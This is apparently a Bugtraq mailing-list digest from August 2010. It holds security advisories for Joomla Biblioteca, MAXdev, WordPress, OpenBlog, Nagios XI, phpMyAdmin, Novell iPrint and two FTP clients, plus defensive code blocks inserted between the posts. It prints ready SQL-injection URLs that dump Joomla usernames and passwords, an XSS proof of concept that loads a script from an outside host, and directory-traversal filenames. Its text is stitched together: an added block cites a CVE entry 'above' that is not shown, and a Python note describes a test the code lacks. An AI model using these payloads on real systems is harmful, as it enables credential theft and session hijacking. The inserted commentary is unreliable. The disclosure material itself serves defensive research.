2010.0/x86_64/mysql-5.1.42-0.6mdv2010.0.x86_64.rpm
 e32753015f97d63a4bc07e88d9823250  
2010.0/x86_64/mysql-bench-5.1.42-0.6mdv2010.0.x86_64.rpm
 c06b10d407d93365d728eacecf54ae2b  
2010.0/x86_64/mysql-client-5.1.42-0.6mdv2010.0.x86_64.rpm
 f89dc39e6cc7a5c4e567f8c92cff9c5d  
2010.0/x86_64/mysql-common-5.1.42-0.6mdv2010.0.x86_64.rpm
 8983a954ac90e6f57b3b6b93dd5a390d  
2010.0/x86_64/mysql-co
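The CVE-2010-2008 entry above describes a schema name whose #mysql50# prefix
is followed by ".", ".." or "../" being turned into a directory move inside
the server data directory. As an added example, not MySQL's code and not its
fix: the component check a server that derives a directory name from an
identifier should apply after stripping such a prefix. The prefix handling
and the function names are assumptions made for the example.

```c
#include <stddef.h>
#include <string.h>

/* Assumed convention, after the advisory: a schema named with the legacy
   "#mysql50#" prefix maps to a directory whose name is whatever follows the
   prefix. */
#define LEGACY_PREFIX "#mysql50#"

/* A name is acceptable as a single directory component only if it is
   non-empty, is not "." or "..", and contains no path separator. A NUL
   cannot appear because the name is a C string; a caller that receives a
   length-delimited identifier must reject embedded NULs before this point. */
int is_safe_dir_component(const char *name)
{
    if (name == NULL || name[0] == '\0') return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    if (strchr(name, '/') || strchr(name, '\\')) return 0;
    return 1;
}

/* Resolve the on-disk component for a schema name: strip the legacy prefix if
   present, then apply the component check to what remains. Returns 1 and
   points *component at the name to use, 0 if the schema name must be rejected. */
int schema_dir_component(const char *schema, const char **component)
{
    const char *name = schema;
    if (strncmp(schema, LEGACY_PREFIX, strlen(LEGACY_PREFIX)) == 0)
        name = schema + strlen(LEGACY_PREFIX);
    if (!is_safe_dir_component(name)) return 0;
    *component = name;
    return 1;
}
```

The check is applied to the stripped name, which is the one that actually
reaches the filesystem; validating the identifier before the prefix is
removed is how "#mysql50#.." slips past a check that only looks at the first
character.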

Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities

2010-08-23 Thread Salvatore Fresta aka Drosophila

Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities

 Name  Biblioteca
 Vendorhttp://www.cielostellato.info
 Versions Affected 1.0 Beta

 AuthorSalvatore Fresta aka Drosophila
 Website   http://www.salvatorefresta.net
 Contact   salvatorefresta [at] gmail [dot] com
 Date  2010-08-21

X. INDEX

 I.ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.FIX
 

I. ABOUT THE APPLICATION


Component  that  allows  the automatic  management  of a
library  in  electronic format. It  can manage books and
their  loans  through  an  attractive, simple and usable
graphical user interface.


II. DESCRIPTION
___

This component doesn't use the common Joomla functions
to  get  the parameters' values from GET, POST etc., and
none  of  these  are  properly sanitised  before  being
used in SQL queries.


III. ANALYSIS
_

Summary:

 A) Multiple Blind SQL Injection
 B) Multiple SQL Injection
 

A) Multiple Blind SQL Injection
___


The  parameter  testo  passed  to  bi.php (site and admin
frontends)  is  properly sanitised before being used in a
SQL query. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.


B) Multiple SQL Injection
_

The  parameter testo  passed  to  stampa.php, pdf.php and 
models/biblioteca.php (when "view" is set to "biblioteca"
) is  properly sanitised before being used in SQL queries.
This  can  be  exploited to  manipulate  SQL  queries  by
injecting arbitrary SQL code.


IV. SAMPLE CODE
___

A) Multiple SQL Injection

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23


V. FIX
__

No fix.



XSS vulnerability in MAXdev

2010-08-23 Thread advisory
Vulnerability ID: HTB22563
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_maxdev.html
Product: MAXdev
Vendor: MAXdev ( http://www.maxdev.it/ ) 
Vulnerable Version: 1.0.83 and Probably Prior Versions
Vendor Notification: 05 August 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "modules.php" script to properly 
sanitize user-supplied input in "sid" variable. Successful exploitation of this 
vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:


http://host/modules.php?op=modload&name=News&file=article&sid=1%22%3E%3Cscript+src=http://www.htbridge.ch/advisory/1.js+a=

Solution: Upgrade to the most recent version



Re: [MajorSecurity SA-080]WordPress 3.0.1 - Cross Site Scripting Issue

2010-08-23 Thread MustLive

Hello Bugtraq!

Regarding this XSS in WordPress 3.0.1 
(http://www.securityfocus.com/archive/1/513101/30/30/threaded) I'll note 
what I already wrote at my site last week, and already wrote to David: 
for the attack it's necessary to know the token (_wpnonce), which is designed 
to protect against CSRF attacks (which exists in WP 2.9.2 and previous versions 
and must be in the next versions), so practically it'll be hard to use this XSS.


Note that WordPress 2.0.x versions aren't vulnerable, because they have no 
such functionality. But, as I checked, versions 2.7 - 2.9.2 are vulnerable 
(similarly to versions 3.0 and 3.0.1). WP 2.6.2 is also vulnerable, but the 
attack must be made differently in it (a completely different request), and 
only a POST request is possible (whereas in WP 2.7 and higher both GET and 
POST requests are possible). In WP 2.6.x this functionality is implemented 
differently.


Also I'll note that the researcher stated that the attack goes via parameter 
checked[0] in script wp-admin/plugins.php, when parameter action equals 
delete-selected. As I checked, XSS code can be set in checked[0], as well as 
in checked[1] and so on, and also in checked[]. Besides, in WP 2.8 - 2.9.2 
(and possibly in 3.0 and 3.0.1) it's possible to set either action equal to 
delete-selected or action2 equal to delete-selected, while in versions 2.7.x 
it's possible to use only action.


Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 





[Bkis-04-2010] Multiple Vulnerabilities in OpenBlog

2010-08-23 Thread Bkis
[Bkis-04-2010] Multiple Vulnerabilities in OpenBlog

1. General Information

OpenBlog is free software for building a blogging platform. OpenBlog is
written in PHP and available at http://www.open-blog.info. In August 2010,
Bkis Security discovered some XSS and CSRF vulnerabilities in this
software; in particular, there is a vulnerability which might allow
privilege elevation on OpenBlog 1.2.1. Taking advantage of this
vulnerability, a hacker might execute malicious code in the user's browser
or even take control of the blog. Bkis has sent its warning to the developer.

Details: http://security.bkis.com/?p=1382
SVRT Advisory: Bkis-04-2010
Initial vendor notification: 08/09/2010
Release Date: 08/23/2010
Update Date: 08/23/2010
Discovered by: Duong Manh Linh, Truong Tu Hai, Nguyen Hoang Vinh - Bkis
Attack Type: Bypass Authentication, XSS, CSRF
Security Rating: High
Impact: Code Execution
Affected Software: OpenBlog < v1.2.1

2. Technical Details

The most dangerous vulnerability resides in the session module of OpenBlog.
Exploiting this vulnerability, a hacker can sign in to a normal user's
account but obtain administrator privileges. This is due to a weakness in
the user rights checking and authentication mechanism, resulting in a high
possibility of faking administrator privileges.

Besides, Bkis also found some XSS and CSRF vulnerabilities in the following
OpenBlog functions:

XSS holes are found in the following modules:
-   Create a new post 
-   Edit a post
-   Create a new page

Because these modules' input variables are not adequately checked and
filtered, a hacker might insert his code into the links. If a user logs in
to his blog and clicks the link, the hacker's malicious code (JavaScript)
will be executed, leading to the loss of the user's personal information
saved in the browser.

CSRF vulnerabilities are found in the following modules:
-   Edit an user
-   Setting
-   Templates
-   Disable/Enable Sidebar  
-   Feed settings
-   Bookmarking
-   New post
-   Edit a post
-   Delete a post
-   New page
-   Edit a page
-   Delete a page
-   New navigation item
-   Edit a navigation item
-   New link
-   Edit a link
-   Delete a link
-   New category
-   Edit a category
-   Delete a category
-   Delete a comment
-   Delete a user

OpenBlog does not require the user's confirmation when performing the above
functions. Therefore, users might be tricked into performing unwanted
actions without their consent, for example by clicking faulty links.
Specifically, a hacker might fool the blog's administrators into deleting or
editing the posts on the blog.

3. Solution

Rating the vulnerability as critical, Bkis recommends that organizations and
individuals using OpenBlog be cautious with links of unknown origin. At the
same time, users should keep themselves updated with the developer's
information to get timely updates.


--
Bkis (www.bkis.com)
Blog (blog.bkis.com)
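
The advisory's CSRF finding comes down to two missing checks: state-changing
functions are reachable through a plain link, and no request carries a secret
a third-party page could not know. The following is an added illustration in
Python, not OpenBlog's code nor anything from the Bkis post; the action names
are taken from the advisory's list, while the session store, request shape
and return strings are constructed here.

```python
"""Synchronizer-token CSRF check for state-changing blog actions.

Added illustration, not OpenBlog code. Action names are taken from the
advisory's list; the session store and request shape are constructed here.
"""
import hmac
import secrets
from typing import Dict, Optional

# A few of the functions the advisory lists as CSRF-able.
MUTATING_ACTIONS = {
    "edit_user", "delete_user", "settings", "templates",
    "new_post", "edit_post", "delete_post", "delete_comment",
}

# Constructed in-memory session store: session id -> CSRF token.
_sessions: Dict[str, str] = {}


def start_session() -> str:
    """Create a session and bind a fresh, unguessable token to it."""
    sid = secrets.token_urlsafe(16)
    _sessions[sid] = secrets.token_urlsafe(32)
    return sid


def csrf_token_for(sid: str) -> str:
    """The token the application embeds in its own forms for this session.
    A third-party page cannot read it, so it cannot forge a valid request."""
    return _sessions[sid]


def handle(action: str, method: str, sid: str,
           form: Optional[Dict[str, str]] = None) -> str:
    """Authorise one request; returns 'ok' or a 'denied: ...' reason."""
    form = form or {}
    if action not in MUTATING_ACTIONS:
        return "ok"  # read-only action: a plain link is harmless
    if method.upper() != "POST":
        # Following a link (GET) must never change state; that is the
        # "clicking faulty links" path the advisory describes.
        return "denied: state change via GET"
    expected = _sessions.get(sid)
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the check itself leaks nothing about the token.
    if expected is None or not hmac.compare_digest(
            supplied.encode(), expected.encode()):
        return "denied: missing or wrong csrf token"
    return "ok"


if __name__ == "__main__":
    sid = start_session()
    print(handle("delete_post", "GET", sid))
    print(handle("delete_post", "POST", sid, {"csrf_token": csrf_token_for(sid)}))
```

The method check alone already defeats the link-click scenario; the token is
what protects against a hidden auto-submitting form on an attacker's page.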



[ MDVSA-2010:158 ] squirrelmail

2010-08-23 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:158
 http://www.mandriva.com/security/
 ___

 Package : squirrelmail
 Date: August 23, 2010
 Affected: Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in squirrelmail:
 
 functions/imap_general.php in SquirrelMail before 1.4.21 does not
 properly handle 8-bit characters in passwords, which allows remote
 attackers to cause a denial of service (disk consumption) by making
 many IMAP login attempts with different usernames, leading to the
 creation of many preferences files (CVE-2010-2813).
 
 This update provides squirrelmail 1.4.21, which is not vulnerable to
 this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2813
 ___

 Updated Packages:

 Corporate 4.0:
 89ba0e4278ea6e087736ae48799b4254  
corporate/4.0/i586/squirrelmail-1.4.21-0.1.20060mlcs4.noarch.rpm
 f203b9f964a9c2ece1502e2096b2fac7  
corporate/4.0/i586/squirrelmail-ar-1.4.21-0.1.20060mlcs4.noarch.rpm
 3c5fff13b0202b27968f3e3a850fcb7f  
corporate/4.0/i586/squirrelmail-bg-1.4.21-0.1.20060mlcs4.noarch.rpm
 48bebcbed19831db900aab396de0bf8b  
corporate/4.0/i586/squirrelmail-bn-bangladesh-1.4.21-0.1.20060mlcs4.noarch.rpm
 10d43734ce8163e27c882e209fc785ff  
corporate/4.0/i586/squirrelmail-bn-india-1.4.21-0.1.20060mlcs4.noarch.rpm
 38f5d99823cec79db6e5857e1ff7ba07  
corporate/4.0/i586/squirrelmail-ca-1.4.21-0.1.20060mlcs4.noarch.rpm
 42ced5fa4f5b8d650c730f170af8af83  
corporate/4.0/i586/squirrelmail-cs-1.4.21-0.1.20060mlcs4.noarch.rpm
 5f3e04f5b7a96564c1a862ca6e48adc5  
corporate/4.0/i586/squirrelmail-cy-1.4.21-0.1.20060mlcs4.noarch.rpm
 c1d2b6ccfd1eda17724a24558b4c3b66  
corporate/4.0/i586/squirrelmail-cyrus-1.4.21-0.1.20060mlcs4.noarch.rpm
 c4ea6f45deb6c166e885f3fc554da996  
corporate/4.0/i586/squirrelmail-da-1.4.21-0.1.20060mlcs4.noarch.rpm
 c008a788df89e860d415946fdda72a3c  
corporate/4.0/i586/squirrelmail-de-1.4.21-0.1.20060mlcs4.noarch.rpm
 736ecd5fa3a229da787e668979e904b5  
corporate/4.0/i586/squirrelmail-el-1.4.21-0.1.20060mlcs4.noarch.rpm
 2903f7a2e4261d845c9b5189eb608386  
corporate/4.0/i586/squirrelmail-es-1.4.21-0.1.20060mlcs4.noarch.rpm
 69a1299f11393e3cb8a5a06cece2f91f  
corporate/4.0/i586/squirrelmail-et-1.4.21-0.1.20060mlcs4.noarch.rpm
 d1df847877e636365bc7f627bbdf3858  
corporate/4.0/i586/squirrelmail-eu-1.4.21-0.1.20060mlcs4.noarch.rpm
 345dd0cb7810dcee94854cf7a090d4f3  
corporate/4.0/i586/squirrelmail-fa-1.4.21-0.1.20060mlcs4.noarch.rpm
 9e2c37a5f4d35eff430da490d90ca5f7  
corporate/4.0/i586/squirrelmail-fi-1.4.21-0.1.20060mlcs4.noarch.rpm
 71be5ff8b164e87e0719cbf21134f244  
corporate/4.0/i586/squirrelmail-fo-1.4.21-0.1.20060mlcs4.noarch.rpm
 268f1d6a6e73918bb0343ffc46a8841b  
corporate/4.0/i586/squirrelmail-fr-1.4.21-0.1.20060mlcs4.noarch.rpm
 2dd5cc33a4a63dc509fda7648d7522f4  
corporate/4.0/i586/squirrelmail-fy-1.4.21-0.1.20060mlcs4.noarch.rpm
 9f5a7c258f9d6bd102b6b93a73c6836e  
corporate/4.0/i586/squirrelmail-he-1.4.21-0.1.20060mlcs4.noarch.rpm
 2ca62ca3db9ca0fcc350c497488e9cf5  
corporate/4.0/i586/squirrelmail-hr-1.4.21-0.1.20060mlcs4.noarch.rpm
 15671592eb8e3503f2bf46dc8c8030b9  
corporate/4.0/i586/squirrelmail-hu-1.4.21-0.1.20060mlcs4.noarch.rpm
 7696e73a26940c4c0d2918c1d1517ce3  
corporate/4.0/i586/squirrelmail-id-1.4.21-0.1.20060mlcs4.noarch.rpm
 8fc9c19902708b28848da7db058ea10b  
corporate/4.0/i586/squirrelmail-is-1.4.21-0.1.20060mlcs4.noarch.rpm
 5e0ba98ba97bb89d8281a759629b8fca  
corporate/4.0/i586/squirrelmail-it-1.4.21-0.1.20060mlcs4.noarch.rpm
 3e7e3835a601f82bb8801ec397d0537a  
corporate/4.0/i586/squirrelmail-ja-1.4.21-0.1.20060mlcs4.noarch.rpm
 206caedb71bef79fccb08775af109d95  
corporate/4.0/i586/squirrelmail-ka-1.4.21-0.1.20060mlcs4.noarch.rpm
 c571adc8677f31c256a1b2bd4650151c  
corporate/4.0/i586/squirrelmail-km-1.4.21-0.1.20060mlcs4.noarch.rpm
 e5503d9ed93be15ef2cb26e2cd3d650f  
corporate/4.0/i586/squirrelmail-ko-1.4.21-0.1.20060mlcs4.noarch.rpm
 36087440e023d1ccc50f0bed5009682c  
corporate/4.0/i586/squirrelmail-lt-1.4.21-0.1.20060mlcs4.noarch.rpm
 d03b3857e69219cbc058500c33ac12a9  
corporate/4.0/i586/squirrelmail-lv-1.4.21-0.1.20060mlcs4.noarch.rpm
 f3dc3244d85170fffa134b7922a7fcfa  
corporate/4.0/i586/squirrelmail-mk-1.4.21-0.1.20060mlcs4.noarch.rpm
 6e35e85c0a59271d7d88efa5fdd84d96  
corporate/4.0/i586/squirrelmail-ms-1.4.21-0.1.20060mlcs4.noarch.rpm
 354299b5ce498349a4a74dbac10a90e0  
corporate/4.0/i586/squirrelmail-nb-1.4.21-0.1.20060mlcs4.noarch.rpm
 ca07a83aa98347f04eb787d5ddc9359c  
corporate/4.0/i586/squirrelmail-nl-1.4.21-0.1.20060mlcs4.noarch.rpm
 6b43e

Secunia Research: Novell iPrint Client "call-back-url" Buffer Overflow Vulnerability

2010-08-23 Thread Secunia Research
== 

 Secunia Research 20/08/2010

  -  Novell iPrint Client "call-back-url" Buffer Overflow  -

== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

== 
1) Affected Software 

* Novell iPrint Client 5.42

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

"Novell iPrint extends print services securely across multiple 
networks and operating systems. Using proven Internet technologies, 
iPrint transforms your Novell Distributed Print Services™ (NDPS®) 
printers into Net-enabled printers, making all your printing resources
instantly accessible with a Web browser and a few mouse clicks".

Product Link:
http://www.novell.com/products/openenterpriseserver/iprint.html

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Novell iPrint 
Client, which can be exploited by malicious people to compromise a 
user's system.

The vulnerability is caused by a boundary error in the handling of the
"call-back-url" parameter value for a "op-client-interface-version" 
operation where the "result-type" parameter is set to "url". This can
be exploited to cause a stack-based buffer overflow via an overly long
"call-back-url" parameter value.

Successful exploitation allows execution of arbitrary code when a user
visits a malicious website.

== 
5) Solution 

Update to version 5.44.

== 
6) Time Table 

03/08/2010 - Vendor notified.
03/08/2010 - Vendor response.
16/08/2010 - Vendor provides status update.
20/08/2010 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-1527 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-104/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Directory Traversal in FTPGetter

2010-08-23 Thread advisory
Vulnerability ID: HTB22567
Reference: http://www.htbridge.ch/advisory/directory_traversal_in_ftpgetter.html
Product: FTPGetter
Vendor: FTPGetter Team ( http://www.ftpgetter.com/ ) 
Vulnerable Version: 3.51.0.05 and Probably Prior Versions
Vendor Notification: 05 August 2010 
Vulnerability Type: File Content Disclosure
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
When exploited, this vulnerability allows an anonymous attacker to write files 
to specified locations on a user's system.

The FTP client does not properly sanitise filenames containing directory 
traversal sequences that are received from an FTP server, for example
a file named "..\..\..\..\..\..\..\somefile.exe".

By tricking a user into downloading a directory from a malicious FTP server that 
contains files with backslash directory traversal sequences in their filenames, 
an attacker can potentially write files into the user's Startup folder to execute 
malicious code when the user logs on.





Nagios XI Login XSS

2010-08-23 Thread Adam Baldwin
 Nagios XI Login XSS

Advisory ID: NGENUITY-2010-007

Vulnerability Information
Class: Cross-Site Scripting (XSS)

Software Description
Nagios XI is the commercial / enterprise version of the open source
Nagios project.

Vulnerability Description
The login page for the Nagios XI management interface prior to version
2009R1.3 is vulnerable to cross-site scripting (XSS). This vulnerability
does not require the victim to be authenticated. This vulnerability was
originally thought to be addressed in version 2009R1.2C.

All the parameters of the login page are vulnerable to injection and
execution of JavaScript. This does not require authentication, but if
the user is authenticated it can provide a reasonably easy way to perform
whatever actions you want as the Admin user (and negates the CSRF protection
that has recently been implemented).

Vendor recommends upgrading to version 2009R1.3 or later.


Technical Description
Here is a non-malicious example. The input after login.php is inserted
into the permalink_base variable without being sanitized.

http://example.com/nagiosxi/login.php?%22;alert%281%29;//


Credits
This vulnerability was discovered by Adam Baldwin

Original Advisory
http://ngenuity-is.com/advisories/2010/aug/19/nagios-xi-login-xss/


phpMyAdmin 3.3.5 / 2.11.10 <= Cross Site Scripting (XSS) Vulnerability

2010-08-23 Thread YGN Ethical Hacker Group
==
 phpMyAdmin 3.3.5 / 2.11.10 <= Cross Site Scripting (XSS) Vulnerability
==


1. OVERVIEW

The phpMyAdmin web application was vulnerable to Cross Site Scripting.


2. PRODUCT DESCRIPTION

phpMyAdmin is a free software tool written in PHP intended to handle
the administration of MySQL over the World Wide Web.
phpMyAdmin supports a wide range of operations with MySQL.
The most frequently used operations are supported by the user
interface (managing databases, tables, fields, relations,
indexes, users, permissions, etc), while you still have the ability to
directly execute any SQL statement.


3. VULNERABILITY DESCRIPTION

Some URLs in phpMyAdmin do not properly escape user inputs, which leads
to a cross site scripting vulnerability.
For more information about this kind of vulnerability, see OWASP Top
10 - A2, WASC-8 and
CWE-79: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting').


4. VERSIONS AFFECTED

phpMyAdmin 3.3.5 and lower
phpMyAdmin 2.11.10  and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/db_sql.php-01.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/db_sql.php-02.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/db_structure.php-01.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/db_structure.php-02.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/server_databases.php-01.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/server_databases.php-02.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/server_privileges.php-01.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/server_privileges.php-02.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/sql.php-01.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/sql.php-02.jpg

A full list of URLs (both unexploitable and exploitable)
that fail to HTML-escape user inputs:

URL: http://target/phpmyadmin/db_search.php
Affected Parameter(s): field_str

URL: http://target/phpmyadmin/db_sql.php
Affected Parameter(s):  QUERY_STRING, delimiter

URL: http://target/phpmyadmin/db_structure.php
Affected Parameter(s): sort

URL:  http://target/phpmyadmin/js/messages.php
Affected Parameter(s): db

URL: http://target/phpmyadmin/server_databases.php
Affected Parameter(s): sort_by

URL: http://target/phpmyadmin/server_privileges.php
Affected Parameter(s): QUERY_STRING, checkprivs, dbname,
pred_tablename, selected_usr[], tablename, username

URL: http://target/phpmyadmin/setup/config.php
Affected Parameter(s): DefaultLang

URL: http://target/phpmyadmin/sql.php
Affected Parameter(s): QUERY_STRING, cpurge, goto, purge, purgekey, table, zero_rows

URL: http://target/phpmyadmin/tbl_replace.php
Affected (Dynamic) Parameter(s):
fields[multi_edit][0][f7235a61fdc3adc78d866fd8085d44db],
fields_name[multi_edit][0][349e686330723975502e9ef4f939a5ac]


6. IMPACT

Attackers can compromise the currently logged-in user's session and inject
arbitrary SQL statements (CREATE, INSERT, UPDATE, DELETE)
via crafted XSS payloads.


7. SOLUTION

Upgrade to phpMyAdmin 3.3.5.1 or 2.11.10.1


8. VENDOR

phpMyAdmin (http://www.phpmyadmin.net)


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

08-09-2010: vulnerability discovered
08-10-2010: notified vendor
08-20-2010: vendor released fix
08-20-2010: vulnerability disclosed


11. REFERENCES

Vendor Advisory URL:
http://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/phpmyadmin/[phpmyadmin-3.3.5]_cross_site_scripting(XSS)
Previous Release: http://www.phpmyadmin.net/home_page/security/PMASA-2008-6.php
XSS FAQ: http://www.cgisecurity.com/xss-faq.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [08-20-2010]



-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
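
Both this advisory and the Nagios XI one above are the same defect in two
output contexts: phpMyAdmin fails to HTML-escape request parameters, and
Nagios drops the query string into the JavaScript variable permalink_base
unescaped. The block below is an added Python illustration, not code from
phpMyAdmin, Nagios XI or either advisory. It borrows the variable name
permalink_base and the decoded PoC string from the Nagios post; the rendering
functions and the read-back check are constructed here to show why the
encoding has to match the context the value lands in.

```python
"""Context-aware output encoding for the two sinks these advisories describe.

Added illustration, not phpMyAdmin or Nagios XI code. The variable name
permalink_base and the login-page rendering shape come from the Nagios post;
everything else is constructed.
"""
import html
import json
import re
from typing import Optional


def html_escape(value: str) -> str:
    """HTML text/attribute context: the escaping the phpMyAdmin post calls for."""
    return html.escape(value, quote=True)


def js_string_literal(value: str) -> str:
    """JavaScript string-literal context inside a <script> block.

    json.dumps escapes quotes, backslashes and control characters but leaves
    '</' alone; a literal '</script>' would close the block early, so it is
    escaped as well."""
    return json.dumps(value).replace("</", "<\\/")


def render_unsafe(permalink_base: str) -> str:
    """The pattern the Nagios advisory describes: raw concatenation."""
    return 'var permalink_base = "' + permalink_base + '";'


def render_safe(permalink_base: str) -> str:
    """Hardened form: the value can only ever be one string literal."""
    return "var permalink_base = " + js_string_literal(permalink_base) + ";"


def embedded_value(script: str) -> Optional[str]:
    """Read back the value a rendered line carries as ONE string literal.

    Returns None when the line no longer parses as a single literal, i.e.
    when attacker-controlled text has escaped the string context."""
    m = re.fullmatch(r'var permalink_base = (".*");', script, re.S)
    if not m:
        return None
    try:
        return json.loads(m.group(1))
    except json.JSONDecodeError:
        return None
```

Note that the unsafe renderer behaves identically to the safe one on benign
input, which is why this class of bug survives normal testing; only the
read-back check with the quote-bearing payload separates them.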


Directory Traversal in 3D FTP Client

2010-08-23 Thread advisory
Vulnerability ID: HTB22565
Reference: 
http://www.htbridge.ch/advisory/directory_traversal_in_3d_ftp_client.html
Product: 3D FTP Client
Vendor: SiteDesigner Technologies, Inc. ( http://3dftp.com/3dftp.htm ) 
Vulnerable Version: 9.0 build 2 and Probably Prior Versions
Vendor Notification: 05 August 2010 
Vulnerability Type: File Content Disclosure
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
When exploited, this vulnerability allows an anonymous attacker to write files 
to specified locations on a user's system.

The FTP client does not properly sanitise filenames containing directory 
traversal sequences that are received from an FTP server, for example
a file named "..\..\..\..\..\..\..\somefile.exe".

By tricking a user into downloading a directory from a malicious FTP server that 
contains files with backslash directory traversal sequences in their filenames, 
an attacker can potentially write files into the user's Startup folder to execute 
malicious code when the user logs on.





Ruxcon 2010 Final Call For Papers

2010-08-23 Thread cfp


RUXCON 2010 FINAL CALL FOR PAPERS

Ruxcon would like to announce the final call for papers for the sixth annual 
Ruxcon conference.

This year the conference will take place over the weekend of 20th and 21st of 
November.

Ruxcon will be held at CQ, Melbourne, Australia.

The deadline for submissions is the 10th of October.

What is Ruxcon?

Ruxcon is the premier technical computer security conference within Australia. 
Ruxcon aspires to bring together the individual talents of the best and the 
brightest security folk within the Aus-Pacific region, through live 
presentations, activities, and demonstrations.

Ruxcon's unique approach to running a security conference ensures that the 
conference is accessible to all levels of the security industry. Ruxcon aims to 
be the most interesting, thought provoking, and relevant information security 
conference in Australia.

The conference is held over two days in a relaxed atmosphere, allowing 
attendees to enjoy themselves whilst networking within the community and 
expanding their knowledge of security.

Live presentations and activities will cover a full range of defensive and 
offensive security topics, varying from previously unpublished research to 
required reading for the security community.

For more information, please visit http://www.ruxcon.org.au

Presentation Information

Presentations will be 50 minutes in length, and should be fully supplemented 
with slides and any other relevant material.

Presentation Submissions

Ruxcon would like to invite people who are interested to submit a presentation.

Topics of interest include, but are not limited to:

   * Mobile Device Security
   * Virtualisation, Hypervisor and Cloud Security
   * Malware Analysis
   * Reverse Engineering
   * Exploitation Techniques
   * Rootkit Development
   * Code Analysis
   * Forensics and Anti-Forensics
   * Embedded Device Security
   * Web Application Security
   * Network Traffic Analysis
   * Wireless Network Security
   * Cryptography and Cryptanalysis
   * Social Engineering
   * Law Enforcement Activities
   * Telecommunications Security (SS7, 3G/4G, GSM, VOIP, etc)

Submissions should thoroughly outline your desired presentation subject. 
Accompanying your submission should be the slides you intend to use or a 
detailed paper explaining your subject.

If you have any enquiries about submissions, or would like to make a 
submission, please send an e-mail to
presentati...@ruxcon.org.au.

The deadline for submissions is the 10th of October.

If approved we will additionally require:

  1. A brief personal biography (between 2-5 paragraphs in length).
  2. A description of your presentation (between 2-5 paragraphs in length).

Contact Details

